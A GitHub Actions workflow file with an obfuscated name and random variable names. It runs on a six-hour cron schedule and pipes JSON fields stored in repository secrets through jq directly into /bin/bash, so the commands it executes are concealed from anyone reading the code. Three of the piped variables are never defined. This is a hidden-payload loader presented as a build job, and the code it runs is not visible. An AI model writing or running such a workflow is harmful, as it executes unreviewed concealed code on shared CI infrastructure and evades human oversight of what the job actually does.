name: zhongxiaozxs

on:
  workflow_dispatch:
  schedule:
    - cron: '19 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhongxiaozxs
        env:
          en90: ${{ secrets.en90 }}
        run: |
          echo $en90 | jq -r .knkyo62764 | /bin/bash
          echo $cpy532 | jq -r .v38 | /bin/bash
          echo $bfw318 | jq -r .ltbu32435 | /bin/bash
          echo $rlk27486 | jq -r .zm059 | /bin/bash

